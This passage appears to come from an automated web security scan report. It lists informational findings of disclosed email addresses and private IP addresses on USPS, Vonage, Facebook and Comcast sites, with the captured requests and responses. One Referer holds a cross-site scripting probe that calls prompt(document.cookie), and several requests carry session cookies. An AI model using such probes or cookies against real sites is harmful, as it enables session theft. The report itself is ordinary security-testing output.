       @author        aziz.syed@akqa.com
       @description    Global style definitions to be used when printing
       
       Contents
       1. HIDDEN ELEMENTS
   --------------------------------------------------------------- */
   
/*    
   =========== 1. HI
...[SNIP]...

18.46. https://www.usps.com/ContentTemplates/common/css/usps.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/usps.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/usps.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "3a48bf6e-3-0-b483"
Last-Modified: Wed, 31 Aug 2011 14:32:13 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 46211
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:14 GMT
Connection: keep-alive

   /*    ---------------------------------------------------------------
       @filename        usps.css
       @author            aziz.syed@akqa.com
       @description    Page layout + global style definitions
       
       Contents
       1. Page Layout
       2. Generic Styles
       3. Header
       4. Footer
       5. Navigation
       6. Miscellaneous
       7. Quick Tools
       8. Lef
...[SNIP]...

18.47. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/carousel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/scripts/usps/modules/usps/widget/carousel.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/scripts/usps/modules/usps/widget/carousel.js HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uspsstaticwebpop=1; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315327999740:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: application/x-javascript
ETag: "5bfda3-1017-0-10cb"
Last-Modified: Tue, 22 Feb 2011 18:28:11 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4299
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:20 GMT
Connection: keep-alive

/**
*
* @fileoverview
* @author <a href="mailto:aziz.syed@akqa.com">Aziz Syed</a>
*/

dojo.provide("usps.widget.carousel");

/**
* @name USPS.widget.carousel
* @namespace
*/
dojo.d
...[SNIP]...

18.48. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/homecarousel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/scripts/usps/modules/usps/widget/homecarousel.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/scripts/usps/modules/usps/widget/homecarousel.js HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uspsstaticwebpop=1; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315327999740:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: application/x-javascript
ETag: "e9bd10c-109-0-257a"
Last-Modified: Mon, 22 Aug 2011 14:42:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9594
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:19 GMT
Connection: keep-alive

/**
*
* @fileoverview
* @author <a href="mailto:aziz.syed@akqa.com">Aziz Syed</a>
*/

dojo.provide("usps.widget.homecarousel");
dojo.require("usps.widget.carousel");
/**
* @name USPS.wi
...[SNIP]...

18.49. http://www.vonage.com/googlesearch/cluster.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/cluster.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /googlesearch/cluster.js HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:59 GMT
Server: Apache
Last-Modified: Thu, 25 Sep 2008 20:21:35 GMT
ETag: "a54bb2-14b2-457be25b711c0"
Accept-Ranges: bytes
Content-Length: 5298
Content-Type: application/javascript

// Copyright 2006 Google Inc., All Rights Reserved
// dspencer@google.com

// Modified to support XML response from GSA
// 2008-03-27
// bdanbury@vonage.com

/**
* @fileoverview
*
* This file is for the rendering of Clustered Search results
* on the GSA.
*
*
* The flow is:
*
* - User initiates search query and wants clustered results
*
* - Resp
...[SNIP]...
calls
* GWS and so on, and then the results come back as XML
*
* - Then the XML is rendered in renderXML().
*
* The XML that comes back from the GSA has this general structure:
*
*
* @author dspencer@google.com
*
* @requires common.js
* @requires xmlthtp.js
* @requires uri.js
*/


var CS_CLUSTER_CONTAINER = 'clustering';

/* Prefix of cluster label element id. This is followed by a number, probably 0..9
...[SNIP]...

18.50. http://www.vonage.com/googlesearch/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /googlesearch/common.js HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:59 GMT
Server: Apache
Last-Modified: Wed, 11 Jun 2008 17:10:00 GMT
ETag: "204bb3-db19-44f671d618a00"
Accept-Ranges: bytes
Content-Length: 56089
Content-Type: application/javascript

// copied from google3/java/com/google/caribou/antlers/fin/jsdata

//------------------------------------------------------------------------
// This file contains common utilities and basic javascrip
...[SNIP]...
ss = token.substring(1, (end != -1) ? end : token.length);
} else if (address == "") {
name += token;
}
i += token.length;
}

// Check if it's a simple email address of the form "jlim@google.com"
if (address == "" && name.indexOf("@") != -1) {
address = name;
name = "";
}

name = CollapseWhitespace(name);
name = StripQuotes(name, "'");
name = StripQuotes(name, "\"");
addre
...[SNIP]...

18.51. http://www.vonage.com/googlesearch/uri.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/uri.js

Issue detail

The following email address was disclosed in the response:

Request

GET /googlesearch/uri.js HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:59 GMT
Server: Apache
Last-Modified: Wed, 11 Jun 2008 17:10:00 GMT
ETag: "420bb5-4497-44f671d618a00"
Accept-Ranges: bytes
Content-Length: 17559
Content-Type: application/javascript

// Copyright 2006 Google Inc.
// All Rights Reserved.

/**
* @fileoverview
* Implements RFC 3986 for parsing/formatting URIs.
*
* @author msamuel@google.com
*/

/**
* creates a uri from the string form. The parser is relaxed, so special
* characters that aren't escaped but don't cause ambiguities will not cause
* parse failures.
*
* @return {URI|Nu
...[SNIP]...

19. Private IP addresses disclosed  previous  next
There are 79 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


19.1. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://l.yimg.com/p/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&t=Red%20Hot%20Chili%20Peppers%20Exclusive%20Interview!%20New%20Album,%20New%20Member,%20New%20Video%20-%20Maximum%20Performance&l=Share&t_sec=mit_share&t_act=facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Tue, 06 Sep 2011 05:51:44 -0700
Pragma:
X-FB-Rev: 434551
X-FB-Server: 10.27.107.101
X-Cnection: close
Date: Tue, 06 Sep 2011 12:49:44 GMT
Content-Length: 425

fb_sharepro_render([{"url":"http:\/\/new.music.yahoo.com\/blogs\/live\/13348\/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video\/","normalized_url":"http:\/\/new.music.yahoo.com
...[SNIP]...

19.2. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "03dae24e377203ab54abd8eeddd80a35"
X-FB-Server: 10.27.138.116
X-Cnection: close
Content-Length: 133612
Cache-Control: public, max-age=1060
Expires: Tue, 06 Sep 2011 13:13:01 GMT
Date: Tue, 06 Sep 2011 12:55:21 GMT
Connection: close
Vary: Accept-Encoding

/*1315303860,169577076,JIT Construction: v434551,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

19.3. http://customer.comcast.com/Pages/FAQDisplay.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQDisplay.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /Pages/FAQDisplay.aspx?Guid=eb1cdc34-2fa3-4cf6-8b00-32f1e4e30feb HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://customer.comcast.com/Pages/FAQViewer.aspx?Guid=2ac169ad-5420-475d-b1ef-5d5cf2224639
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; VISITORID=2086762009; ASP.NET_SessionId=wz5mknqosvb1zefgqhr2jlu3; __utma=24577576.1274302.1315329902.1315329902.1315329902.1; __utmb=24577576.2.10.1315329902; __utmc=24577576; __utmz=24577576.1315329902.1.1.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=internet%20phone; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331799|PC#1315327839174-766376.19#1316539539|check#true#1315329999; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%252C%255B'isp%252520email'%252C'1315329913981'%255D%255D%7C1473182713981%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331738091%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520customerguarantee%2520%7C1315331738106%3B; fsr.s={"v":1,"pv":12,"lc":{"d0":{"v":12,"s":true,"e":2}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Disp%2520email%3B%20stc18%3Disp%2520email%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcomcastsupportforumsdev%253D%252526pid%25253DComcast%25252520Help%25252520and%25252520Support%25252520Forums%25252FXfinity%25252520Central%25252FCustomer%25252520Service%25252FGamePass%25252520cancellation%25252520and%25252520e-mail%25252520response%25252520times%25252F%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%25252F%25252Fwww.comcast.com%25252FCorporate%25252FCustomers%25252FCustomerGuarantee.html%252526ot%25253DA%3B%20SC_LINKS%3D%3B

Response

HTTP/1.0 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:25:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 34622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Overl
...[SNIP]...
<a target="_blank" href="http://10.0.0.1">http://10.0.0.1</a>
...[SNIP]...
<a target="_blank" href="http://10.0.0.1">http://10.0.0.1</a>
...[SNIP]...
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1<br />
...[SNIP]...
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<a target="_blank" href="http://192.168.0.1 ">http://192.168.0.1 </a>
...[SNIP]...

19.4. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQDn8o3CVmyCPPAP&url=http%3A%2F%2Ffitv-episodes.s3.amazonaws.com%2Ffrontier%2Fgame_on%2Flafayette_jefferson_89x90.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.102.52
X-Cnection: close
Content-Length: 3692
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:44 GMT
Date: Tue, 06 Sep 2011 12:45:44 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.5. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQDlEXRAsBVA5vFU&url=http%3A%2F%2Fthumbnails.hulu.com%2F186%2F40035186%2F40035186_120x90_generated.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.147.32
X-Cnection: close
Content-Length: 4886
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.6. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQAihlFIzrBbcHHG&url=http%3A%2F%2Fcache.thenewsroom.com%2Fktvi%2F2011%2F09%2F03%2F27cf8413-933b-4ed4-ab52-d0e227bd3660_preview.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.47.44
X-Cnection: close
Content-Length: 21082
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.7. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCiVmH7SbfvZ6Zn&url=http%3A%2F%2Fthumbnails.hulu.com%2F213%2F50071213%2F185282_120x90_generated.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.188.64
X-Cnection: close
Content-Length: 2576
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.8. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQD9mu08dehnlv7w&url=http%3A%2F%2Fcache.thenewsroom.com%2Fwreg%2F2011%2F08%2F30%2F825598fd-decb-4754-abd5-cebf604c73fe_preview.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.55.18.44
X-Cnection: close
Content-Length: 19904
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.9. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCwDKcLl0sR3GsB&url=http%3A%2F%2Fpthumbnails.5min.com%2F10343096%2F517154781_3.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.209.33
X-Cnection: close
Content-Length: 3699
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.10. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

